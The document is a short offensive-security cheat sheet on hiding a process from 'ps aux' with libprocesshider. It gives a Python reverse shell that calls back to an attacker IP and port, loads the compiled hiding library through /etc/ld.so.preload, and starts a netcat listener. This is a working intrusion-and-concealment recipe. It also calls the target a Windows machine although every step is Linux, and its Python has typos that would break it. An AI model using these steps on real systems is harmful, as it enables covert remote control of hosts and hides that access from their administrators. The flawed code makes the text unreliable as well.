## General

GOAL ---> Hide process from `ps aux`

Libprocesshider is a library that allows software developers to hide the details of a process from the operating system. It provides an API for hiding the process name and arguments, as well as for hiding the presence of the process from process management utilities. The library is useful for hiding the details of malware or other types of malicious software, as well as for protecting proprietary software from reverse engineering.

Important
- Can only hide one process at the time


## Commands

The  reposity need to be cloned on the target (windows machine)

Download the reposity (Target)
```
git clone https://github.com/gianlucaborello/libprocesshider.git
```

Create reverse shell and compile the code (Target) 
```
# Create a rever shell (reverse_shell.py)
nano reverse_shell.py
	#!/usr/bin/python3 
	from os import dup2  
	from subprocess import run
	import socket  
	s-socket.socket(socket.AF_INET,socket.SOCK_STREAM)
	s.connect(("IP",PORT))  
	dup2(s.fileno(),0)  
	dup2(s.fileno(),1)
	dup2(s.fileno(),2)  
	run([*/bin/bash","-i*])

# Give chmod permission
chmod +x reverse_shell.py

# Edit processhider.c
nano processhider.c
- Change the script name of the python code for your evil code
- Save

# Compile the code in the direcotry
USER@sid:~/libprocesshider$ make
'---> This will create libprocesshider.so

# Copy the file in the right folder
cp libprocesshider.so /usr/local/lib/

# Load it with the global dynamic linker
echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload
```

Launch the reverse_shell
```
./reverse_shell.py
```

Netcat Lisener (Attacking)
```
nc -lvnp PORT
```

The process should now be hiden


## More Information

More information ---> https://github.com/gianlucaborello/libprocesshider